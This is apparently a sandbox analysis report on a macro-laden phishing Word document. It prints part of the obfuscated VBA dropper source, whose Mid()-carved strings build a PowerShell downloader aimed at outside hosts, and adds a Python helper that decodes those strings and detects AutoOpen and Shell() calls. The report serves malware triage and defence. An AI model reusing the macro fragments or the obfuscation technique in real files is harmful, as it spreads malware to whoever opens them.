Verdict: MALICIOUS
Risk Score: 242
Malware Insights
MITRE ATT&CK:
- T1059.005 Command and Scripting Interpreter: Visual Basic
- T1566.001 Phishing: Spearphishing Attachment
- T1059 Command and Scripting Interpreter
The document carries VBA macros with an AutoOpen entry point, so the code runs as soon as the document is opened with macros enabled. The critical OLE_VBA_SHELL heuristic shows that the macro calls Shell() to run an external command, and ClamAV flags both the document (Img.Dropper.PhishingLure-6443153-0) and the decoded macro module (Doc.Trojan.Obfuscated-6443078-0), which is consistent with a phishing-lure dropper or downloader. The macro source is heavily obfuscated: long arithmetic expressions over undefined variables serve as junk that fails silently under On Error Resume Next, while the operative strings are carved out of longer literals with Mid(). Those carved fragments contain PowerShell syntax (DownloadFile(, [CHAr] casts, chained .Replace() calls), so the Shell() target is most likely a PowerShell downloader. The analyzer reconstructs 'http://blog.siplik.com/vTW5jYjY/pXIAhVNF' from these fragments as the likely source of the second-stage payload. Note that this URL was not found by the EMBEDDED_URL channel (which only extracted the OOXML schema URL from the document body); it is a reconstruction from split string fragments, so replay the Mid() windows and the token substitutions against the full macros.bas before treating the exact scheme and path as an indicator. A fragment of a second hostname ('charlesdunda...s.co', split by the same tokens) is visible at the end of the truncated preview and should be recovered from the full artifact as well.
Heuristics (5)
- ClamAV: Img.Dropper.PhishingLure-6443153-0 (critical, CLAMAV_DETECTION): ClamAV detected this file as malware: Img.Dropper.PhishingLure-6443153-0
- VBA macros detected (medium, OLE_VBA_MACROS, 2 related findings): Document contains VBA macro code
- Shell() call in VBA (critical, OLE_VBA_SHELL): Shell() call in VBA
- AutoOpen macro (high, OLE_VBA_AUTOOPEN): AutoOpen macro
- Embedded URL (info, EMBEDDED_URL): One or more URLs were extracted from the document. The URL itself is not a detection; see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
  URL: http://schemas.openxmlformats.org/drawingml/2006/main (in document text, OLE body)
Extracted artifacts (1)
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size | SHA-256 | Detection | Obfuscation or payload |
|---|---|---|---|---|---|---|
| macros.bas | vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 74317 bytes | 82de7429ce70a6f9cfbbc822bce8bfbcdf8829b69e6a6dee877e2a0059d062e0 | ClamAV: Doc.Trojan.Obfuscated-6443078-0 | unlikely |

The artifact-level "Obfuscation or payload: unlikely" flag disagrees with both the ClamAV signature name and the preview below, which is padded with junk arithmetic and rebuilds its strings with Mid(); weight the signature and the source over the flag.
Preview script (first 1,000 lines of the extracted script):
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Attribute VB_Name = "AqkATsDs"
Function GFUXzrWdafKF()
On Error Resume Next
whlMibJQ = 44224474 / IjNoqdzbWAN - 536083786 + CSng(lwpsDRNawui) + 2 - Chr(7013) - qzScOXP / 8527 * VboGMuXkaGoI + Fix(7798) + 9905 * Sin(7) / 310 * Sin(BpimrYmr)
hzdGUvi = 44224474 / cIjdYPPdFBOkh - 536083786 + CSng(KNXnHQdCZVUDn) + 2 - Chr(7013) - viRmjbAhEoaSZ / 8527 * DzzTqMEwpZiOOZ + Fix(7798) + 9905 * Sin(7) / 310 * Sin(KJUcahbjcDFq)
luihUl = Mid("Gw1fkwI0Y9YqQLmvzvltftUuFBXGa+JIq= JIq+JIqzJIq+JIqTJIq+JTmi+TmiIq3ns'+'J2jdMm", 30, 43)
ndLfBF = 44224474 / iOEHwrKWN - 536083786 + CSng(kbEJKijJucArFW) + 2 - Chr(7013) - oKjqXwdtFzZBEw / 8527 * ZDtpYjwfXDK + Fix(7798) + 9905 * Sin(7) / 310 * Sin(rPPmIiJJh)
vizVdtJtPb = 44224474 / UDICVNjaQ - 536083786 + CSng(awcfTuM) + 2 - Chr(7013) - QcjJSYVYiDW / 8527 * kdXWzupPRICbMI + Fix(7798) + 9905 * Sin(7) / 310 * Sin(sPFXWpocBkLlj)
XzljljTvpJT = 44224474 / jqAGizMlhbN - 536083786 + CSng(CzwQzRsfM) + 2 - Chr(7013) - MjmiqKQTvmww / 8527 * CoRwzSmWjC + Fix(7798) + 9905 * Sin(7) / 310 * Sin(MRorkrQCOti)
IIuYBIs = Mid("K5Ha7E5ZUKdd3NFl84GwVD8q+'+'JIqhtJIq+JIqtpsJ'+'Tmi+TmiIq+JIq://JIq+JIqblogJIq+JIq.siplikJITmi+Tmiq+JIq.com/vTW'+'5JI'+'q+JIqjYJIq+JIq/pXIAhVNF", 24, 112)
oiIVGzSY = 44224474 / wfcEUTzYFiZF - 536083786 + CSng(IIaFwJhdJdfzFv) + 2 - Chr(7013) - VmmJFiU / 8527 * ZXsotTJXwQs + Fix(7798) + 9905 * Sin(7) / 310 * Sin(UbfObCDnCzE)
AOkYLrt = 44224474 / NYhziHEX - 536083786 + CSng(bErsJiwSi) + 2 - Chr(7013) - rTIMcomsiM / 8527 * bHiIcCBSwkjDjj + Fix(7798) + 9905 * Sin(7) / 310 * Sin(WAiRRDT)
PZtPnKs = 44224474 / YzCTvPAOo - 536083786 + CSng(AhEVnJzFhiM) + 2 - Chr(7013) - fuGXiCfha / 8527 * SdQwRqbiQir + Fix(7798) + 9905 * Sin(7) / 310 * Sin(bwKFOtowPVBIR)
PjArj = Mid("iRuUftVZHKo][Tmi+cnvajP6zrBU9aZdW9DkqcRZK2O3", 12, 6)
OVzTIKj = 44224474 / apFLEJwOaKRA - 536083786 + CSng(NjjbwzmnHPYdbR) + 2 - Chr(7013) - NMvtHWETXqzI / 8527 * VJsSjEJQwpUDhw + Fix(7798) + 9905 * Sin(7) / 310 * Sin(ZjidsLANP)
FTsnc = 44224474 / azwCuLDsIUZ - 536083786 + CSng(GdivQrQUN) + 2 - Chr(7013) - zkEpMXicdXd / 8527 * lziSIOkObWLZh + Fix(7798) + 9905 * Sin(7) / 310 * Sin(oEGiBHS)
hnuvUjCIT = 44224474 / saIQIkzrmS - 536083786 + CSng(XGuWIUPWbpZalt) + 2 - Chr(7013) - ITQoVvduqiAAp / 8527 * UMviUCa + Fix(7798) + 9905 * Sin(7) / 310 * Sin(GkqkrnhSzXWSc)
CnvPEptjQ = Mid("ScBEpnCh8q+JIqc in zT3bcd){JIq+JIqt'+'ry{Tmi+'+'TmiJIq+JIqzT3francJIq+JIq.D'+'JIq+JIqownloJIq+JIqadFile'+'(zT'+'3abc.ToStrinJIqiL3pXSUfGlA9", 10, 118)
OrUhj = 44224474 / AMzEzfOfqCoRsh - 536083786 + CSng(zjBkzEaZ) + 2 - Chr(7013) - HIjZWwVVWqz / 8527 * VDPEzwjIlQ + Fix(7798) + 9905 * Sin(7) / 310 * Sin(HrIvAXTq)
vqSQTXvBUMO = 44224474 / oKUsAMHYZMYoTF - 536083786 + CSng(cVkEjjoHHhRrN) + 2 - Chr(7013) - AdnDtARzcKK / 8527 * IpBSfPahvkKPa + Fix(7798) + 9905 * Sin(7) / 310 * Sin(zDMKjUusZ)
LQVZTcVmrL = 44224474 / mSzqwoIrjS - 536083786 + CSng(BjqcjlfzHuQuqv) + 2 - Chr(7013) - hNDVwCAXjDG / 8527 * HKoocSVLXA + Fix(7798) + 9905 * Sin(7) / 310 * Sin(POrUifWXGvUH)
HwSzLzJw = Mid("IMzvBTMzY9zAmWu0zWldqn3TVLzItq80+['+'CHAr]73),[CHA'+'r]1'+'24 -cREpLACE ([CHAr]115+[CHAr]105+[CHAr]49'+'),[CHAr]36)) ').REPLace('Tmi',[STriNG][cHAR]39).REPLace('Pt2',[STriNG][cHAR]36) ) Iz5", 31, 156)
fLKid = 44224474 / kkZEXisaunYz - 536083786 + CSng(oBBRfjP) + 2 - Chr(7013) - XdiANkSbqw / 8527 * PTivpVKRs + Fix(7798) + 9905 * Sin(7) / 310 * Sin(VmpAwYIhDPJK)
rXPirCWKR = 44224474 / DujQFQG - 536083786 + CSng(fikSQiV) + 2 - Chr(7013) - EzktIjDuHXjpO / 8527 * YKXoNFrBj + Fix(7798) + 9905 * Sin(7) / 310 * Sin(rdldhjF)
sDbajvOOn = 44224474 / MHvEJtawD - 536083786 + CSng(JkmGGLvVRWjCq) + 2 - Chr(7013) - APMJtnjGEEVnu / 8527 * AYSlRzjQM + Fix(7798) + 9905 * Sin(7) / 310 * Sin(CWHtrnfKQ)
QaKhYE = Mid("FaLGq+JIq/,htJIq+Tmi+TmiJIT'+'mi+TmiqtJIq+JIqp:JIq+JIq//charlesdundaJI'+'q+JIqs.co.8J7nXjiHU58MIilakj1
... (truncated)
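To turn the preview above into something checkable, the following Python script is an added example written for this page; it is not the analyzer's code and not part of the sample. It emulates VBA's 1-based Mid() over the Mid("...", start, len) literals in source order (the three literals from the preview are embedded verbatim in a constructed stand-in for the 74 KB macros.bas, together with a constructed AutoOpen and Shell() line that the report asserts but the truncated preview does not show), mirrors the report's AutoOpen and Shell() heuristics with the editor's own regexes, and peels the string layers that the fragments themselves reveal: PowerShell literal joins ('+') and the .Replace('Tmi', char 39) / .Replace('Pt2', char 36) calls. Treating the surviving JIq token as the next layer's quote marker is an assumption (it is not visible in the truncated preview, but after the Tmi layer every occurrence of JIq sits exactly where a quote separator belongs); the zT3 prefix is left untouched because the page shows nothing about it.

```python
"""Triage helper for an olevba-decoded VBA module (added example, not analyzer code).

Assumptions not taken from the report: the payload is assembled from Mid() literals
in source order; 'JIq' is the next layer's quote marker; the Shell() line and the
module layout below are constructed.
"""
import re

# Constructed stand-in for macros.bas: the three Mid() lines are copied from the
# preview, the junk line is in the same style, AutoOpen/Shell are constructed.
SAMPLE_VBA = """
Function GFUXzrWdafKF()
On Error Resume Next
whlMibJQ = 44224474 / IjNoqdzbWAN - 536083786 + CSng(lwpsDRNawui) + 2 - Chr(7013)
IIuYBIs = Mid("K5Ha7E5ZUKdd3NFl84GwVD8q+'+'JIqhtJIq+JIqtpsJ'+'Tmi+TmiIq+JIq://JIq+JIqblogJIq+JIq.siplikJITmi+Tmiq+JIq.com/vTW'+'5JI'+'q+JIqjYJIq+JIq/pXIAhVNF", 24, 112)
CnvPEptjQ = Mid("ScBEpnCh8q+JIqc in zT3bcd){JIq+JIqt'+'ry{Tmi+'+'TmiJIq+JIqzT3francJIq+JIq.D'+'JIq+JIqownloJIq+JIqadFile'+'(zT'+'3abc.ToStrinJIqiL3pXSUfGlA9", 10, 118)
HwSzLzJw = Mid("IMzvBTMzY9zAmWu0zWldqn3TVLzItq80+['+'CHAr]73),[CHA'+'r]1'+'24 -cREpLACE ([CHAr]115+[CHAr]105+[CHAr]49'+'),[CHAr]36)) ').REPLace('Tmi',[STriNG][cHAR]39).REPLace('Pt2',[STriNG][cHAR]36) ) Iz5", 31, 156)
payload = IIuYBIs & CnvPEptjQ & HwSzLzJw
Shell(payload, vbHide)
End Function
Sub AutoOpen()
GFUXzrWdafKF
End Sub
"""


def vba_mid(s, start, length=None):
    """VBA Mid(): 1-based start; a start past the end yields an empty string."""
    if start < 1:
        raise ValueError("VBA Mid start must be >= 1")
    if length is None:
        return s[start - 1:]
    if length < 0:
        raise ValueError("VBA Mid length must be >= 0")
    return s[start - 1:start - 1 + length]


# Mid("<literal>", start, len); VBA escapes an embedded double quote as "".
MID_RE = re.compile(r'Mid\("((?:[^"]|"")*)"\s*,\s*(\d+)\s*,\s*(\d+)\s*\)')


def recover_fragments(vba_source):
    """Return the substrings each Mid() call yields, in source order."""
    return [
        vba_mid(m.group(1).replace('""', '"'), int(m.group(2)), int(m.group(3)))
        for m in MID_RE.finditer(vba_source)
    ]


def peel_layers(text):
    """Undo the string-assembly layers visible in the preview.

    Each layer is a PowerShell literal join ('a'+'b' -> 'ab') followed by a
    .Replace(): the preview shows Tmi -> ' (char 39) and Pt2 -> $ (char 36).
    The final JIq -> ' substitution is an ASSUMPTION (see the lead-in).
    """
    def join(s):
        return s.replace("'+'", "")

    s = join(text)
    s = s.replace("Tmi", "'").replace("Pt2", "$")
    s = join(s)
    s = s.replace("JIq", "'")  # assumed next-layer quote marker
    return join(s)


# Names mirror the report's heuristic IDs; the patterns are the editor's own.
# The last two are extra signals for this sample's style, not analyzer heuristics.
HEURISTICS = {
    "OLE_VBA_AUTOOPEN": re.compile(r"\b(?:AutoOpen|Auto_Open|Document_Open|Workbook_Open)\b", re.I),
    "OLE_VBA_SHELL": re.compile(r"\bShell\s*\(", re.I),
    "ON_ERROR_RESUME_NEXT": re.compile(r"\bOn\s+Error\s+Resume\s+Next\b", re.I),
    "MID_STRING_BUILDER": MID_RE,
}


def run_heuristics(vba_source):
    """Map each firing heuristic name to its hit count."""
    return {name: len(rx.findall(vba_source)) for name, rx in HEURISTICS.items() if rx.search(vba_source)}


INDICATORS = ("http", "://", "DownloadFile", "Shell", "[CHAr]", "REPLace", "ToString")


def indicator_hits(cleaned_fragments):
    """Map fragment index -> payload indicators found after peeling (case-insensitive)."""
    hits = {}
    for idx, frag in enumerate(cleaned_fragments):
        found = [k for k in INDICATORS if k.lower() in frag.lower()]
        if found:
            hits[idx] = found
    return hits


if __name__ == "__main__":
    print("heuristics:", run_heuristics(SAMPLE_VBA))
    frags = recover_fragments(SAMPLE_VBA)
    for i, frag in enumerate(frags):
        print(i, repr(peel_layers(frag)))
    print("indicators:", indicator_hits([peel_layers(f) for f in frags]))
```

Under the stated JIq assumption the first fragment collapses to a URL beginning https://blog.siplik.com/vTW5jY, and the second to a foreach-style DownloadFile( loop; the scheme and path do not match the summary's reconstruction, which is exactly the kind of discrepancy to settle against the full macros.bas before either string is pushed out as an indicator.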